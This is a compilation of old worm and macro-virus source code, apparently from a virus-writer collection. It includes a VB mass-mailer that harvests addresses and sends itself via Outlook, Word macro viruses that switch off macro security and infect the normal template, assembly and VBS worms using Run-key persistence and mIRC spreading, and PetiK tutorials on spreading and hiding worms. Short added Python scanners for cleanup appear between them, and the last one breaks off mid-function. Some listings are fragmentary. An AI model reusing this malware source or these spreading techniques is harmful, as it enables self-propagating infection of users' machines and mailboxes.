Close #2
Shell "c:\piss.exe c:\brigada8.zip " & vdir & App.EXEName & ".exe", vbHide
End Sub
'--------------------e-mail collect and e-mailing-----------------------------
Sub listht(dir)
On Error Resume Next
Dim fso, ssfh, filh
Set fso = CreateObject("Scripting.FileSystemObject")
Set ssfh = fso.GetFolder(dir).SubFolders
For Each filh In ssfh
infht (filh.path)
listht (filh.path)
Next
End Sub
Sub infht(dir)
Dim mlto As String
Dim fso, cfh, filh, ext, textline, q
Dim j As Long, cnt As Long
Set fso = CreateObject("Scripting.FileSystemObject")
Set cfh = fso.GetFolder(dir).Files
For Each filh In cfh
ext = fso.GetExtensionName(filh.path)
ext = LCase(ext)
If (ext = "htm") Or (ext = "html") Then
Open filh.path For Input As #1
Do While Not EOF(1)
Line Input #1, textline
q = q & textline
Loop
Close #1
For j = 1 To Len(q)
If Mid(q, j, 7) = "mailto:" Then
mlto = ""
cnt = 0
Do While Mid(q, j + 7 + cnt, 1) <> """"
mlto = mlto + Mid(q, j + 7 + cnt, 1)
cnt = cnt + 1
Loop
Call Worming(mlto)
End If
Next
End If
Next
End Sub
Function Worming(mail As String)
On Error Resume Next
Dim a, b, c
Set a = CreateObject("Outlook.Application")
Set b = a.GetNameSpace("MAPI")
If a = "Outlook" Then
b.Logon "profile", "password"
Set c = a.CreateItem(0)
c.Recipients.Add mail
c.Subject = "check us out"
c.Body = "we exist to give everyone a smiley face... :)"
c.Attachments.Add "c:\brigada8.zip"
c.Send
c.DeleteAfterSubmit = True
b.Logoff
End If
End Function
'--------------------commandline parser-----------------------------
Private Function GetCommLine() As String
Dim RetStr As Long, SLen As Long
Dim Buffer As String
RetStr = GetCommandLine
SLen = lstrlen(RetStr)
If SLen > 0 Then
GetCommLine = Space$(SLen)
CopyMemory ByVal GetCommLine, ByVal RetStr, SLen
End If
End Function
'--------------------get special folder-----------------------------
Private Function GetSpecialfolder(CSIDL As Long) As String
Dim r As Long
Dim IDL As ITEMIDLIST
Dim path As String
r = SHGetSpecialFolderLocation(100, CSIDL, IDL)
If r = 0 Then
path$ = Space$(512)
r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal path$)
GetSpecialfolder = Left$(path, InStr(path, Chr$(0)) - 1)
Exit Function
End If
GetSpecialfolder = ""
End Function
'------------------ document infection ---------------------------
Sub wording()
On Error Resume Next
Dim vdir As String
vdir = App.path
If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
FileCopy vdir & App.EXEName & ".exe", "c:\XXXview.exe"
Open "c:\v.r" For Output As #2
Print #2, "REGEDIT4"
Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
Print #2, """Level""=dword:00000001"
Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"
Print #2, """Level""=dword:00000001"
Print #2, """AccessVBOM""=dword:00000001"
Close #2
Shell "c:\regedit.exe /s c:\v.r", vbHide
Kill "c:\v.r"
Open "c:\nl.tmp" For Output As #9
Print #9, "Sub document_close()"
Print #9, "On Error Resume Next"
Print #9, "Open ""c:\xp.exp"" For Output As 2"
Print #9, "Print #2, ""sub document_open()"""
Print #9, "Print #2, ""On Error Resume Next"""
Print #9, "Print #2, ""jbo = ActiveDocument.Shapes(1).OLEFormat.ClassType"""
Print #9, "Print #2, ""With ActiveDocument.Shapes(1).OLEFormat"""
Print #9, "Print #2, "" .ActivateAs ClassType:=jbo"""
Print #9, "Print #2, "" .Activate"""
Print #9, "Print #2, ""End With"""
Print #9, "Print #2, ""end sub"""
Print #9, "Close 2"
Print #9, "Set fso = CreateObject(""Scripting.FileSystemObject"")"
Print #9, "Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule"
Print #9, "Set iw = fso.OpenTextFile(""c:\xp.exp"", 1, True)"
Print #9, "nt.DeleteLines 1, nt.CountOfLines"
Print #9, "i = 1"
Print #9, "Do While iw.atendofstream <> True"
Print #9, "b = iw.readline"
Print #9, "nt.InsertLines i, b"
Print #9, "i = i + 1"
Print #9, "Loop"
Print #9, "ActiveDocument.Shapes.AddOLEObject _"
Print #9, "FileName:=""c:\XXXview.exe"", _"
Print #9, "LinkToFile:=False"
Print #9, "ActiveDocument.Save"
Print #9, "Open ""c:\b8.r"" For Output As #3"
Print #9, "Print #3, ""REGEDIT4"""
Print #9, "Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"""
Print #9, "Print #3, """"""Level""""=dword:00000001"""
Print #9, "Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"""
Print #9, "Print #3, """"""Level""""=dword:00000001"""
Print #9, "Print #3, """"""AccessVBOM""""=dword:00000001"""
Print #9, "Close #3"
Print #9, "Shell ""c:\regedit.exe /s c:\b8.r"", vbHide"
Print #9, "Kill ""c:\b8.r"""
Print #9, "End Sub"
Close #9
Open GetSpecialfolder(CSIDL_STARTUP) & "\startup.vbs" For Output As #6
Print #6, "On Error Resume Next"
Print #6, "Set fso = CreateObject(""Scripting.FileSystemObject"")"
Print #6, "Set oword = CreateObject(""Word.Application"")"
Print #6, "oword.Visible = False"
Print #6, "Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule"
Print #6, "Set iw = fso.OpenTextFile(""c:\nl.tmp"", 1, True)"
Print #6, "nt.DeleteLines 1, nt.CountOfLines"
Print #6, "i = 1"
Print #6, "Do While iw.atendofstream <> True"
Print #6, "b = iw.readline"
Print #6, "nt.InsertLines i, b"
Print #6, "i = i + 1"
Print #6, "Loop"
Print #6, "oword.NormalTemplate.Save"
Print #6, "oword.NormalTemplate.Close"
Print #6, "oword.quit"
Close #6
End Sub
File Brigada.exe received on 05.16.2009 11:20:53 (CET)
Additional information
File size: 75264 bytes
MD5...: 0a8cdb77f334f3f5d542509ed70ace70
SHA1..: 95e493da53b720985007df8f28817b94b7d9a902
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
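The Brigada listing fixes the layout of an infected executable: `Main` and `virustime` treat the first 75264 bytes as the worm body, the host program follows, and `infect()` appends the two-byte marker "b8" that the worm later reads back with `Right(vc, 2)`. That layout is enough to write a recovery tool. The Python below is added here as an example and is not code from the Brigada project: it applies the same end-of-file marker test at byte level, hashes the prepended body against the Brigada.exe MD5 from the report above (the prepended body is the worm file itself), and carves the host back out the way the virus branch of `Main` does. The sample file it builds is entirely constructed, so its body hash will not match and the example shows the difference between a structural hit and a confirmed one.

```python
import hashlib

# Figures taken from the listing and report above: the worm body occupies the
# first 75264 bytes of an infected file, the host follows, and infect()
# appends "b8" as the re-infection marker.
VIRUS_BODY_LEN = 75264
INFECTION_MARKER = b"b8"
# MD5 of Brigada.exe from the report above (75264 bytes); the prepended body is that file.
KNOWN_BODY_MD5 = "0a8cdb77f334f3f5d542509ed70ace70"


def has_infection_marker(data):
    """The worm's own test (Right(vc, 2) <> "b8"), applied to raw bytes."""
    return data.endswith(INFECTION_MARKER)


def analyse(data):
    """Structural check plus hash confirmation of the prepended body."""
    structural = has_infection_marker(data) and len(data) > VIRUS_BODY_LEN + len(INFECTION_MARKER)
    body_md5 = hashlib.md5(data[:VIRUS_BODY_LEN]).hexdigest() if structural else None
    return {
        "structural_match": structural,
        "body_md5": body_md5,
        "confirmed": body_md5 == KNOWN_BODY_MD5,
        "host_len": len(data) - VIRUS_BODY_LEN - len(INFECTION_MARKER) if structural else 0,
    }


def recover_host(data):
    """Return the original host bytes, or None when the layout does not match.
    Mirrors the virus branch of Main(): skip 75264 bytes, then drop the marker."""
    if not analyse(data)["structural_match"]:
        return None
    return data[VIRUS_BODY_LEN:-len(INFECTION_MARKER)]


def constructed_sample():
    """Build a test file with the same layout; every byte is constructed, nothing is real."""
    host = b"MZ" + b"\x00" * 62 + b"constructed host program"
    body = b"MZ" + b"\x90" * (VIRUS_BODY_LEN - 2)
    return body + host + INFECTION_MARKER, host


if __name__ == "__main__":
    sample, _ = constructed_sample()
    print(analyse(sample))
```

The marker alone is weak evidence (any file that happens to end in the ASCII bytes "b8" and is longer than 75266 bytes passes it), so a recovery run should only overwrite a file when `confirmed` is true or the body hash matches another known variant; otherwise log it for manual review.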
comment #
Name : I-Worm.Dandelion
Author : PetiK
Date : November 7th
Size : 6144 bytes
On each run it copies itself under a random name into the %windows% folder and records
that name in the file "dandelion.txt" in the same folder.
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start:
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA ; esi = name of file
push 0
push edi
push esi
api CopyFileA ; copy itself
push 9
push edi
push 1
@pushsz "MS Explor"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA ; regedit
end_twin:
; call spread_computer
call htm_file
end_worm:
push 0
api ExitProcess
spread_computer proc
pushad
call generator_name
mov edi,offset genname
push 50
push offset windir
api GetWindowsDirectoryA
push offset windir
api SetCurrentDirectoryA
push 0
push edi
push offset orig_worm
api CopyFileA
@pushsz "dandelion.txt"
@pushsz "A New Copy Of Worm.Dandelion"
push edi
@pushsz "Copy Of Worm"
api WritePrivateProfileStringA
end_spread_computer:
popad
ret
generator_name:
mov edi,offset genname
api GetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
gen_name:
push ecx
api GetTickCount
push 'Z'-'A'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'A'
stosb
api GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
api Sleep
pop ecx
loop gen_name
mov eax,'exe.'
stosd
ret
spread_computer endp
htm_file proc
pushad
mov edi,offset ptkdir
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,"glP\"
stosd
mov eax,"KTP_"
stosd
pop edi
push edi
api CreateDirectoryA
push edi
api SetCurrentDirectoryA
create_htm:
@pushsz "\WinPatch.htm"
push offset ptkdir
api lstrcat
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push offset ptkdir
api CreateFileA
mov [hHTM],eax
push 0
push offset byte
push e_htm - s_htm
push offset s_htm
push [hHTM]
api WriteFile
push [hHTM]
api CloseHandle
end_htm_file:
popad
ret
htm_file endp
.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
end start
end
'VBS.GoodBye Written in France.
'My last Worm. I say Good Bye
On Error Resume Next
dim w,f,win,sys,file
Set w=CreateObject("WScript.Shell")
Set fso=CreateObject("Scripting.FileSystemObject")
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set tmp=fso.GetSpecialFolder(2)
Set wo=fso.GetFile(WScript.ScriptFullName)
If wo <> (sys&"\Cmmon32.vbs") Then
MsgBox "Look at this new Game",vbinformation,"New Game For You"
img="4D5A50000200000004000F00FFFF0000.."
lire=decr(img)
Set pic=fso.CreateTextFile(win&"\New_Prog.exe",true)
pic.Write lire
pic.Close
'w.Run win&"\New_Prog.exe",1,false
MsgBox "Script : "&wo&vbCrLf&"Error : Cannot read this script"&vbCrLf&"Code : 800A000D",vbcritical,"Windows Script Host"
End If
wo.Copy(sys&"\Cmmon32.vbs")
wo.Copy(sys&"\Plg_PTK\Important.vbs")
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS Cmmon32")
w.RegWrite run,("wscript "&sys&"\Cmmon32.vbs")
cache=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache")
desktop=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop")
personal=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal")
progfile=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
commonfile=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\CommonFilesDir")
Mail(win)
Mail(sys)
Mail(tmp)
Mail(cache)
Mail(desktop)
Mail(personal)
Mail(progfile)
Mail(commonfile)
WormM ""
Function extension
text="ComExeBatDocXlsPptTifBmpJpgGifHtmHttMp3WavMid"
randomize (timer)
tfile=int(rnd(1)*14)+1
crext="."& mid(text,((tfile-1)*3)+1,3)
crext=crext&".vbs"
End Function
Function decr(octet)
For hexa=1 To Len(octet) Step 2
decr=decr & Chr("&h" & Mid(octet, hexa, 2))
Next
End Function
Function WormM(dir)
If Dir = "" Then
If fso.FileExists("C:\mirc\mirc.ini") then dir="C:\mirc
If fso.FileExists("C:\mirc32\mirc.ini") then dir="C:\mirc32
If fso.FileExists(pogfile&"\mirc\mirc.ini") then dir=pogfile&"\mirc\mirc.ini"
If fso.FileExists(pogfile&"\mirc32\mirc.ini") then dir=pogfile&"\mirc32\mirc.ini"
End If
If dir <> "" Then
Set mirc=fso.CreateTextFile(dir&"\script.ini", True)
mirc.WriteLine "[scipt]"
mirc.WriteLine "n0=ON 1:JOIN:#:{ ( $nick == $me ) { halt }"
mirc.WriteLine "n1 = /dcc send $nick " &sys&"\Plg_PTK\Important.vbs"
mirc.WriteLine "n2=}"
mirc.Close
End If
End Function
Function Mail(dossier)
If not fso.FileExists(sys&"\Plg_PTK\Info.txt") Then
Set DF=fso.CreateTextFile(sys&"\Plg_PTK\Info.txt")
DF.WriteLine "Files Found By VBS.GoodBye.Worm :"
DF.WriteBlankLines(1)
DF.Close
End If
If fso.FolderExists(dossier) Then
For Each File in fso.GetFolder(dossier).Files
ext=fso.GetExtensionName(File.Name)
If (ext="htm") or (ext="html") or (ext="php") or (ext="htt") Then
Set see = fso.OpenTextFile(File.path, 1)
liretout = see.ReadAll
For i = 1 to len(liretout)
mailto = mid(liretout,i,7)
If mailto = "mailto:" Then
msgbox mailto,vbinformation,File.path
Exit For
else
End If
Next
see.Close
Set DF = fso.OpenTextFile(sys&"\Plg_PTK\Info.txt", 8, True)
DF.WriteLine date& " " &time& " => " &File.path
DF.Close
End If
Next
End If
End Function
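`WormM` above turns a mIRC installation into a carrier by writing a `script.ini` whose `ON 1:JOIN` handler issues `/dcc send` for the dropped .vbs to every user who joins a channel. The Python below is added here as an example and is not code from the worm or from mIRC: it parses a `script.ini`, tracks handler extent by counting braces across the `nN=` lines, and reports every `dcc send` that sits inside an event handler, so a responder can audit the mIRC folders the worm checks (`C:\mirc`, `C:\mirc32` and the Program Files equivalents). The sample file is constructed from the lines the worm writes, with the misspelt `[scipt]` section reproduced as in the listing; the parser does not depend on the section name.

```python
import re

# Constructed script.ini modelled on the lines WormM writes, plus a harmless
# aliases section so the parser has something to ignore.
SAMPLE_SCRIPT_INI = "\r\n".join([
    "[scipt]",
    "n0=ON 1:JOIN:#:{ ( $nick == $me ) { halt }",
    "n1 = /dcc send $nick C:\\WINDOWS\\SYSTEM\\Plg_PTK\\Important.vbs",
    "n2=}",
    "",
    "[aliases]",
    "n0=/hi /msg $1 hello",
])

# "on <level>:<event>:..." opens a remote event handler
EVENT_RE = re.compile(r"^on\s+[^:\s]+:(\w+):", re.IGNORECASE)
DCC_SEND_RE = re.compile(r"/?dcc\s+send\s+(\S+)\s+(\S+)", re.IGNORECASE)


def audit_script_ini(text):
    """Return one finding per 'dcc send' that sits inside an event handler.
    Braces are counted across lines so the handler's extent is known."""
    findings = []
    section = None
    event = None
    depth = 0
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section, event, depth = line[1:-1], None, 0
            continue
        _key, sep, value = line.partition("=")
        if not sep:
            continue
        value = value.strip()
        m = EVENT_RE.match(value)
        if m:
            event, depth = m.group(1).upper(), 0
        if event is None:
            continue
        d = DCC_SEND_RE.search(value)
        if d:
            findings.append({
                "section": section,
                "line": lineno,
                "event": event,
                "target": d.group(1),
                "file": d.group(2),
            })
        depth += value.count("{") - value.count("}")
        if depth <= 0:
            event = None
    return findings


def is_suspicious(text):
    """True when a JOIN handler pushes a file to other users, the pattern the worm installs."""
    return any(f["event"] == "JOIN" for f in audit_script_ini(text))


if __name__ == "__main__":
    for finding in audit_script_ini(SAMPLE_SCRIPT_INI):
        print(finding)
```

A hit in `script.ini` should be read together with the other artefacts the same listing leaves behind: the copies under the System folder (`Cmmon32.vbs`, `Plg_PTK\Important.vbs`), the `MS Cmmon32` Run value, and the `Plg_PTK\Info.txt` log that `Mail` appends to.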
INFO.TXT
fs="FileSystemObject"
sc="Scripting"
wsc="WScript"
sh="Shell"
crlf=Chr(13)&Chr(10)
Set fso=CreateObject(sc & "." & fs)
Set ws=CreateObject(wsc & "." & sh)
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set tmp=fso.GetSpecialFolder(2)
desk=ws.SpecialFolders("Desktop")
strp=ws.SpecialFolders("StartUp")
Set fl=fso.OpenTextFile(WScript.ScriptFullName,1)
wrm=fl.ReadAll
fl.Close
End If
comment $
Name : I-Worm.Lauli
Author : PetiK
Date : 7th June 2002 -
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
st_worm:push 50
mov esi,offset org_wrm
push esi
push 0
api GetModuleFileNameA
;cop: push 0
; push edi
; push esi
; api CopyFileA
;reg: push 50
; push edi
; push 1
; @pushsz "Wsock32"
; @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
; push 80000002h
; api SHSetValueA
push 0
push 80h
push 3
push 0
push 1
push 80000000h
@pushsz "code.txt" ;push offset org_wrm
inc eax
je end_cr_vbs
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
api CreateFileMappingA
test eax,eax
je end_vbs1
xchg eax,ebp
push 40h
@pushsz "OK"
@pushsz "OK"
push 0
api MessageBoxA
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_vbs2
push 0
push ebx
api GetFileSize
mov [size],eax
chk_byte:
mov edi,offset hex
push edi
p_c: lodsb
call convert
stosb
dec size
cmp size,0
jnz p_c
pop edi
push 40h
@pushsz "Hex String:"
push edi
push 0
api MessageBoxA
end_vbs3:
push esi
api UnmapViewOfFile
end_vbs2:
push ebp
api CloseHandle
end_vbs1:
push ebx
api CloseHandle
end_cr_vbs:
end_worm:
push 0
api ExitProcess
convert:
push ecx
push edi
xor ecx,ecx
mov cl,al
push ecx
shr cl,4
lea edi,hex_table
inc cl
@@y:
inc edi
dec cl
jnz @@y
dec edi
mov al, byte ptr [edi]
pop ecx
and cl,0Fh
lea edi,hex_table
inc cl
@@x:
inc edi
dec cl
jnz @@x
dec edi
mov ah,byte ptr [edi]
pop edi
pop ecx
ret
.data
cpy_wrm db 50 dup (0)
org_wrm db 50 dup (0)
size dd ?
hex_table db "012345789ABCDEF",0
end st_worm
end
Private Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, nSize As Long) As Long
Sub AutoOpen()
Call FuckProtection
Call InfectWord
Call CreateEML
End Sub
Sub InfectWord()
On Error Resume Next
Set nor = NormalTemplate.VBProject.VBComponents
Set doc = ActiveDocument.VBProject.VBComponents
srcvir = "C:\calli.drv"
If nor.Item("Calli").Name <> "Calli" Then
doc("Calli").Export srcvir
nor.Import srcvir
End If
If doc.Item("Calli").Name <> "Calli" Then
nor("Calli").Export srcvir
doc.Import srcvir
ActiveDocument.Save
End If
Kill (srcvir)
End Sub
Sub FuckProtection()
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End Select
WordBasic.DisableAutoMacros 0
End Sub
Sub CreateEML()
bound = ""
For i = 1 To 17
Randomize (Timer)
bound = bound + Chr(Int(Rnd(1) * 8) + 48)
Next
eml1 = "To: """ & strUserName & "@microsoft.com""" & vbCrLf & _
"Subject: Hello You..." & vbCrLf & _
"Date: " & Hour(Now) & ":" & Minute(Now) & ":" & Second(Now) & " +0200" & vbCrLf & _
"MIME-Version: 1.0" & vbCrLf & _
"Content-Type: multipart/mixed;" & vbCrLf & _
vbTab & "boundary = ""----=_NextPart_" & bound & """" & vbCrLf & _
"X-Priority: 3" & vbCrLf & _
"X -MSMail - Priority: Normal" & vbCrLf & _
"X-Unsent: 1" & vbCrLf & _
"X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000" & vbCrLf & vbCrLf & _
"This is a multi-part message in MIME format." & vbCrLf & vbCrLf
eml4 = EncodeBase64(ActiveDocument.FullName)
End Sub
Private Function EncodeBase64(ByVal vsFullPathname As String) As String
On Error Resume Next
Dim b As Integer
Dim Base64Tab As Variant
Dim bin(3) As Byte
Dim s As String
Dim l As Long
Dim i As Long
Dim FileIn As Long
Dim sResult As String
Dim n As Long
Base64Tab = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/")
Erase bin
l = 0: i = 0: FileIn = 0: b = 0:
s = ""
FileIn = FreeFile
s = s & vbCrLf
sResult = sResult & s
s = ""
End If
s = s & "="
Else
b = (bin(0) \ 4) And &H3F
s = s & Base64Tab(b)
s = s & "=="
End If
End If
s = ""
Close FileIn
EncodeBase64 = sResult
End Function
comment *
Name : I-Worm.DieWorm
Author : PetiK
Date : July 10th 2002
Language : win32asm
*
.586p
.model flat
.code
JUMPS
include useful.inc
api macro a
extrn a:proc
call a
endm
start:
get_name:
push 50
mov esi,offset orgwrm
push esi
push 0
api GetModuleFileNameA
get_copy_name:
mov edi,offset cpywrm
push edi
push 50
push edi
api GetWindowsDirectoryA
add edi,eax
mov eax,'acs\'
stosd
mov eax,'renn'
stosd
mov eax,'exe.'
stosd
pop edi
copy_worm:
; push 0
; push edi
; push esi
; api CopyFileA
; push 50
; push edi
; push 1
; @pushsz "ScanW32"
; @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
; push 80000002h
; api SHSetValueA
push 0
push 0
push 3
push 0
push 1
push 80000000h
push offset orgwrm
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_w1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi
push 0
push ebx
api GetFileSize
mov [size],eax
push 40h
@pushsz "Hello"
@pushsz "Hello"
push 0
api MessageBoxA
push 0
push 80h
push 2
push 0
push 1
push 40000000h
@pushsz "essai.txt"
api CreateFileA
mov [hvba],eax
@start_hex:
mov cnt,0
mov edi,offset dochex
push edi
push 0
push offset byte
push 112
push offset dochex
push [hvba]
api WriteFile
push [hvba]
api CloseHandle
f_hex:
end_w3: push esi
api UnmapViewOfFile
end_w2: push ebp
api CloseHandle
end_w1: push ebx
api CloseHandle
end_worm:
push 0
api ExitProcess
conv_hex:
PUSH ECX
PUSH EDI
@@Y:
INC EDI
DEC CL
JNZ @@Y
DEC EDI
MOV AL, BYTE PTR [EDI]
POP ECX
AND CL, 0Fh
LEA EDI, Tab_Hex
INC CL
@@X:
INC EDI
DEC CL
JNZ @@X
DEC EDI
MOV AH, BYTE PTR [EDI]
POP EDI
POP ECX
RET
.data
orgwrm db 50 dup (0)
cpywrm db 50 dup (0)
dochex db 112 dup (0)
hfile dd ?
hvba dd ?
byte dd 0
size dd ?
cnt dd ?
Tab_Hex db "0123456789ABCDEF", 00h
ends
end start
=== How to spread a worm ? ===
=== by PetiK (09/17/2001) ===
###################
#FIND SOME ADDRESS#
###################
The most difficult part of spreading a worm is finding some addresses.
On the computer there are a lot of files which store addresses.
*.WAB file (Windows AddressBook):
---------------------------------
We can find the path of this sort of file in the default value of
HKEY_CURRENT_USER\Software\Microsoft\Wab\WAB4\Wab File Name.
Look at the source of Win32.HiV coded by Benny to examine the mechanism.
For this sort of file, I use another technique. I create a vbs file in C:\.
This vbs file will search all the emails in the Outlook Address Book
and save them in a file in the WINDOWS or SYSTEM folder. This file is afterwards
scanned by the worm (look at the source of I-Worm.Passion or I-Worm.Rush).
#################
#SPREAD THE WORM#
#################
I have imagined something to insert a virus/worm/trojan in a mail which already contains
an attachment. We're going to use *.eml files again
------=_NextPart_001_0009_01C13EF1.BF420560
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
------=_NextPart_000_0008_01C13EF1.BF420560
Content-Type: application/x-msdownload;
name="Winpopup.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Winpopup.exe" <= This is a first attachment
There we are !
If you have suggestions, please mail me at petikvx@multimania.com.
You can visit my website : http://www.petikvx.fr.fm
=== Some Practice Technics ===
=== by PetiK (02/10/2002) ===
###############
#Introduction:#
###############
This article presents some techniques that I use for my worms. I don't code
as well as other coderz (Benny, GriYO, Bumblebee, etc...) but I want
to show what I know how to do. Each part will be accompanied by its source code.
Summary: I:Hide a copy of worm
II:Spread a worm into different drives
III:Extract API from KERNEL32.DLL library
########################
#I:Hide a copy of worm:#
########################
When I read a new description of a worm, I notice that it uses a static name
like services.exe (XTC), winmine.exe (Chainsaw), wsock2.dll (Icecubes).
It's practical because of the name, but it makes deleting the worm practical too.
So my idea was to change the name of the worm at each start. How ?? Easy.
First: create a random name in the %windir% or %sysdir% directory :
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
mov edi,offset copy_worm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov al,"\"
stosb
api GetTickCount \ Thanx to Benny for this
push 9 |
pop ecx |
xor edx,edx |
div ecx |
inc edx |
mov ecx,edx |
copy_g: |
push ecx |
api GetTickCount |
push 'z'-'a' |
pop ecx |
xor edx,edx \
div ecx ---- Example of random name:
xchg eax,edx / jwvv.exe, abgqlbg.exe, slb.exe
add al,'a' |
stosb |
api GetTickCount |
push 100 |
pop ecx |
xor edx,edx |
div ecx |
push edx |
api Sleep | If we don't sleep the name look like:
pop ecx | ggggggg.exe, hhhhhhhh.exe uuuuuuu.exe
loop copy_g |
mov eax,"exe." |
stosd |
pop edi /
Second: Put the original name into Wininit.ini to delete it at the next start:
@pushsz "C:\WINDOWS\WININIT.INI" \
push offset orig_name | [rename]
@pushsz "NUL" >--- NUL=orig_name
@pushsz "rename" |
api WritePrivateProfileStringA /
Third: Copy of the worm:
push 0
push edi ; copy name
push esi ; original name
api CopyFileA
Fourth: Register the name into Win.ini to activate it at the next start:
push edi ; copy name
@pushsz "RUN"
@pushsz "WINDOWS"
api WriteProfileStringA
-----------------------source-----------------------
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
start_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
mov edi,offset copy_worm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov al,"\"
stosb
api GetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
copy_g:
push ecx
api GetTickCount
push 'z'-'a'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'a'
stosb
api GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
api Sleep
pop ecx
loop copy_g
mov eax,"exe."
stosd
pop edi
push 40h
push offset copy_worm
push edi
push 0
api MessageBoxA
push 50
push offset wininit
api GetWindowsDirectoryA
@pushsz "\WININIT.INI"
push offset wininit
api lstrcat
push offset wininit
push esi
@pushsz "NUL"
@pushsz "rename"
api WritePrivateProfileStringA
copy_w: push 0
push edi
push esi
api CopyFileA
run_w: push edi
@pushsz "RUN"
@pushsz "WINDOWS"
api WriteProfileStringA
end_worm:
push 0
api ExitProcess
.data
copy_worm db 50 dup (0)
orig_worm db 50 dup (0)
wininit db 50 dup (0)
end start_worm
end
-----------------------source-----------------------
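The two INI tricks in steps Second and Fourth above leave traces a defender can read back: a `[rename]` entry in WININIT.INI whose target is NUL, and a `run=`/`load=` entry in the `[windows]` section of WIN.INI. The following scanner is an added example for this page (not PetiK's code); the INI contents are constructed and the "random name" pattern is taken from the generator described in step First.

```python
"""Flag the WININIT.INI delete-at-boot entry and the WIN.INI run-at-logon entry
described in the article, and correlate them into the relocate-and-erase pattern.
Added example, standard library only; sample INI files are constructed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    source: str   # file the entry came from
    kind: str     # "delete-at-boot" or "run-at-logon"
    path: str     # the program the entry names


def parse_ini(text):
    """Minimal INI parser: (section, key, value) triples with lower-cased
    section and key; order and duplicate keys are preserved, because
    WININIT.INI legitimately repeats NUL= for every file to delete."""
    entries, section = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        key, sep, value = line.partition("=")
        if sep:
            entries.append((section, key.strip().lower(), value.strip()))
    return entries


def scan_wininit(text):
    """[rename] NUL=<path>: WININIT.EXE deletes <path> at the next boot (step Second)."""
    return [Finding("WININIT.INI", "delete-at-boot", value)
            for section, key, value in parse_ini(text)
            if section == "rename" and key == "nul" and value]


def scan_winini(text):
    """[windows] run=/load= hold a space- or comma-separated program list (step Fourth)."""
    found = []
    for section, key, value in parse_ini(text):
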